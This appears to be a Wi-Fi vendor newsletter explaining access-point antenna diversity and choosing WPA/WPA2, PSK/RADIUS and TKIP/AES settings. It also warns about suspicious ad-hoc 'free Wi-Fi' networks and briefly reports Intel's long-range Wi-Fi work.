We recently encountered a wireless network whose administrator had attempted some creative problem solving. Clients in an outlying building needed wireless connectivity. An access point was already installed in the main building, near to the outlying building. Wireless connectivity in the outlying building was sporadic—almost there, but not reliable enough for day-to-day work. The administrator addressed the issue by replacing one of the access point’s antennas with a single “high-gain” omnidirectional antenna (the antenna was actually 8 dBi).
A similar situation was encountered at a Highway Patrol station. The station had a wireless access point installed on the roof, with the intent of providing wireless coverage to parked patrol cars on either side of the building. The administrator had installed two Yagi directional antennas on the access point, each one pointed towards an opposite side of the building.
In both cases, network connectivity was sporadic. It would occasionally drop for no obvious reason, and data rates were much lower than they would normally be.
Why was performance bad? 802.11b and 802.11g access points have two antennas for a specific reason: diversity. Because of a phenomenon called multi-path fading, signal strength can sometimes differ by a significant amount over just a few inches of space. Installing two antennas, separated by a few inches, on the access point, allows the access point to compensate for multi-path fading. When a transmission is detected by one antenna, the access point momentarily listens on the other antenna, and then chooses the antenna that has the strongest signal strength. This is known as receive diversity. When the access point transmits a packet, it can’t know which antenna will produce the strongest signal strength at the client, so it usually just transmits on the same antenna from which it last received data.
A key assumption for diversity to work properly is that both antennas cover roughly the same physical area. In order for 802.11 to work right, each device must be able to detect when other devices are transmitting. When both of the access point’s antennas are identical, this condition is met, and everything works properly. Whenever a transmission passes near the access point, whichever one of the two antennas is currently in use will pick up that the transmission is occurring, then the access point will switch to whichever antenna gets the strongest signal strength.
When two different antennas are installed on an access point, this condition is not met. Each antenna “covers” a different physical area. Because the access point only listens on one antenna at a time, it might totally miss the fact that a packet is being received by the other antenna. Because the access point only transmits on one antenna at a time, it might accidentally send a packet out the “wrong” antenna, causing the client to miss the packet entirely.
This explains what was going wrong in the two wireless networks described in the beginning of the article. In one case, the access point had two omnidirectional antennas, but one was higher-gain than the other. When the access point used the higher-gain antenna, clients in the outlying building got excellent connectivity, but when the access point happened to be using the lower-gain antenna, connectivity to the outlying building suffered. Why would the access point use the lower-gain antenna if the higher-gain antenna should have always had higher signal strength? Remember that multipath fading can cause significant changes in signal strength—possibly enough to outweigh the difference in antenna gain between the low-gain antenna and the high-gain antenna. With the highway patrol station, the situation was even worse. The two antennas were directional, and were pointed in opposite directions. Their coverage areas were not even remotely similar.
So what’s the right thing to do if you want to install external antennas on an access point? One option is to purchase two of the exact same antenna and attach one of them to each of the access point’s antenna connectors. If you do this, be aware that the two antennas must be installed at a specific distance from each other in order for diversity to work properly; they can’t just be plugged in and installed any-which-way.
A second option is to purchase an antenna that has diversity built in. This antenna will have two connectors that plug into your access point. Inside the antenna’s housing are two separate antenna elements that implement diversity. This type of antenna allows you to have increased antenna gain without giving up diversity and without the extra mounting complexity that comes from using two separate external antennas, as in the first option.
A third option is to give up diversity entirely and just use a single antenna. This might sound like a bad option, but in many cases, it’s the most effective one. Multipath fading is not a problem in some environments, such as certain point-to-point links. In cases like this, just connect the external antenna to one of the access point’s antenna connectors and connect no antenna to the other antenna connector. The access point will need to be told that it only has a single antenna, or it will try to do diversity between the two connectors even though one of them doesn’t have any antenna at all. You can configure most access points to use either the “left” or the “right” antenna connector. The default configuration is usually “auto” or “diversity” (same function, different name). If you install an external antenna, configure the access point to only use the antenna connector to which the external antenna is attached.
Antenna selection dialog box from an access point. The TX (transmit) antenna is set to “Auto”, which means diversity is enabled. Do not attach an external antenna to this access point without reconfiguring it as described below.
Finally, keep in mind that 802.11n also uses multiple antennas, but it does so in a fundamentally different way than 802.11b and 802.11g. 802.11n uses all antennas at the same time. Does this mean that we won’t be able to use external antennas with 802.11n access points? Will we have to buy multiple antennas for each access point if we want to take advantage of 802.11n’s higher speeds? This remains to be seen.
By now, you probably know that WPA and WPA2 are both excellent choices for wireless security. WPA can be configured to run in several different modes. This month, we’ll help you decide which WPA mode is right for your network.
Security selection modes in a popular access point. Most access points have modes that are similar to this.
The graphic above shows the security mode selection menu from a popular access point. “Disable,” the first option, would only be used in an open wireless network, and won’t be discussed further. “WEP”, the last option, probably doesn’t provide enough security for most networks, and should be avoided if WPA is available, which it is, so we won’t discuss it any further either.
The remaining modes consist of a combination of several factors:
WPA vs. WPA2. WPA was the security standard released by the Wi-Fi Alliance prior to the ratification of the 802.11i standard. WPA2 was the security standard released by the Wi-Fi Alliance after the ratification of the 802.11i standard. WPA2 and 802.11i are essentially synonymous. WPA2 provides certain security and performance enhancements over WPA, the most significant of which is the option to use AES encryption instead of the TKIP encryption that is used by WPA.
Pre-Shared Key vs. RADIUS. In Pre-Shared Key mode, the access point is configured with a passphrase—a string of text. When a station tries to connect, the user of the station is asked to type in the passphrase before the station can connect. In RADIUS mode, which is also sometimes known as Enterprise mode, the access point and the station collaborate to authenticate the station via a RADIUS server. RADIUS mode can be more secure and easier to administrate, but it requires a RADIUS server, which small businesses and home networks seldom care to afford and maintain. Pre-Shared Key mode is much simpler, but is somewhat less secure and more difficult to administrate.
Mixed vs. Only. Some devices do not have the hardware, firmware, or drivers to support WPA2. Fortunately, the 802.11i standard (which is functionally equivalent to WPA2) defines backwards compatibility functionality, whereby a WPA2 access point can support WPA clients. If the access point is configured to a “Mixed” setting, then both WPA2 and WPA clients will be allowed to connect. In an “Only” setting, only WPA2 clients will be allowed to connect.
Picking the best option from these modes is not too difficult. Since WPA2 includes backwards compatibility for WPA clients, there isn’t much of a reason to choose one of the “WPA” settings. We’re not aware of a compelling reason to exclude WPA2 clients from a wireless network. If you’re concerned about WPA clients being able to connect, just choose one of the “WPA2 Mixed” settings, and the access point will handle both WPA and WPA2 devices. Even if you only have WPA clients today, the WPA2 option will be enabled on the access point in case a WPA2 client comes along—and don’t worry, the WPA2 client will figure it out and use the stronger encryption and authentication.
Pre-shared Key vs. Radius is also relatively simple. For home and small to medium office installations, Pre-shared key is likely to be the only option, since these sites probably won’t have a RADIUS server. Larger enterprises probably already have a RADIUS server and will want to take advantage of the increased security and central administration that it offers. Small network administrators do have some options if they want to use RADIUS mode instead of Pre-shared Key. Free RADIUS server software is available for Linux and Windows distributions. Also, some vendors have begun to target the small and medium business Wi-Fi authentication space with rudimentary RADIUS server software that is specifically designed to support 802.11 authentication. These programs tend not to have as many bells and whistles as their more full-featured counterparts, but they’re also much cheaper and easier to maintain.
Most administrators will probably prefer “Mixed” settings to “Only” settings. Unless you’re 100% sure that no WPA clients will need to connect, it’s best to leave the access points set to “Mixed” WPA/WPA2. This network was originally set to “WPA2 Only.” (the network administrator later reported that excluding WPA devices was done largely out of a misplaced sense of elitism, rather than any security concern). This worked fine until a guest visited the office and mysteriously couldn’t connect. The problem was eventually traced to the fact that the guest’s wireless card and drivers only supported WPA and did not support WPA2.
The network from which these screenshots were taken currently uses the “WPA2 Pre-Shared Key Mixed” setting. The site is a regional office of a small engineering firm. All of the firm’s computers use WPA2, but “Mixed” is enabled in case guests bring computers that only support WPA. Pre-Shared Key is used because the firm does not yet need, nor have the IT resources to support, a RADIUS server.
Selecting the encryption algorithm
The graphic above shows an additional setting that is available: the encryption algorithm that the device should use. Two options are present: TKIP and AES. As was mentioned above, WPA uses TKIP encryption, whereas WPA2 has the option of using either TKIP, AES, or both. The three options in the menu above correspond to those three settings.
As you can see in the graphic, the access point has been configured to use WPA (in the “Security Mode” pull-down menu), but note that AES is still an option in the “WPA Algorithms” menu! Some manufacturers allow the use of WPA with AES encryption, but you should realize that this is a non-standard option and might not work with all devices. The WPA standard allows for the use of TKIP and WEP encryption. AES was only added with WPA2. Therefore, in order to ensure maximum compatibility, we should not configure the access point to use AES encryption with WPA. We should only configure the access point to allow AES if the security mode is set to WPA2.
If “WPA2 Pre-Shared Key Only” or “WPA2 RADIUS Only” mode is used, then AES is the correct choice for the encryption algorithm. The “Only” setting prohibits WPA clients from connecting, so there is no need to support the weaker TKIP encryption. As discussed in the previous paragraph, if the network is using WPA only, then “TKIP” is the right choice, for compatibility reasons. If both WPA2 and WPA are available (the access point has been configured to a “Mixed” setting), then “TKIP + AES” is the right choice. This will allow WPA2 stations to use the stronger AES encryption while WPA stations use TKIP.
Although the terminology of this access point is not universal, the basic options shown here are present on most access points in some form or another:
“Should the access point use WPA or WPA2?”
Should the access point use Pre-shared Key or RADIUS mode?”
If WPA2 is used, should the access point allow backwards compatibility with WPA clients?”
Which encryption algorithms should be used?
… and now you should know what you need to know in order to answer those questions.
Below are links to some of the RADIUS server software that was mentioned in this article. Connect802 provides these links for reference only. We do not endorse or support any of these programs.
FreeRadius, an open-source, free RADIUS server (Linux and other UNIX variants only)
WinRadius, a free RADIUS server for Windows (specifically mentions 802.11 compatibility)
Elektron, a commercial RADIUS server targeted at small offices
Recently, I was in an airport, and I saw a wireless network called “Free Public Wi-Fi”. I was suspicious because the signal strength was very low, and I don’t think that the airport actually had free public Wi-Fi. What’s your opinion? Was this network legit?
An “Available Wireless Networks” screen showing a “Free WiFi” network. Legit or not?
An example of such a network is shown in the screen above. The Expert recommends against connecting to such a network in most cases. Notice that the icon to the right of the network indicates that this is an ad-hoc, or “computer-to-computer” network. This means that the device advertising the network is not an access point. It might be a laptop belonging to an attacker who is hoping to lure victims in with the promise of free network access. Once you connect, it’s like plugging a crossover cable in between your two machines, and any vulnerabilities in your system are the attacker’s to exploit.
Could this just be someone trying to share his or her network access? Sure. Once you’ve bought your way onto the airport’s for-pay system, you could elect to use Windows’ Internet Connection Sharing to share that connection with others. This would require some technological knowledge, but it’s definitely doable. There are also some plug-in appliances that automatically share your wireless connection. But The Expert is wary about whose networks he jumps onto, and he’d rather spend a few dollars for access via the airport’s network than risk an attack from an unverified network.
Intel Modifies Wi-Fi, Increases Range Dramatically
This month, Intel announced that it had developed a modification to standard 802.11 hardware. The modification is claimed to increase range up to 100 kilometers, or about 60 miles. Typical Wi-Fi hardware has ranges of only a few miles at most, and typically only hundreds of feet. Even more remarkable is the fact that the modification is accomplished using off-the-shelf 802.11 hardware. One caveat is that the links must be directional, so high-gain antennas are probably a requirement. The technology is intended for developing countries. A trial in Uganda is planned for later this year.
At Connect802 we're your PAGE ONE resource for wireless networking!
Connect802 has the experience, expertise, and resources to help you with your wireless network system. Use your favorite search engine and see what Connect802 is doing. Each month we give you some suggested search terms for you to explore. Here's this month's list. As you look down the search engine results you'll find Connect802 either at the top, or on the first page (true for Google and Excite, unknown for the rest).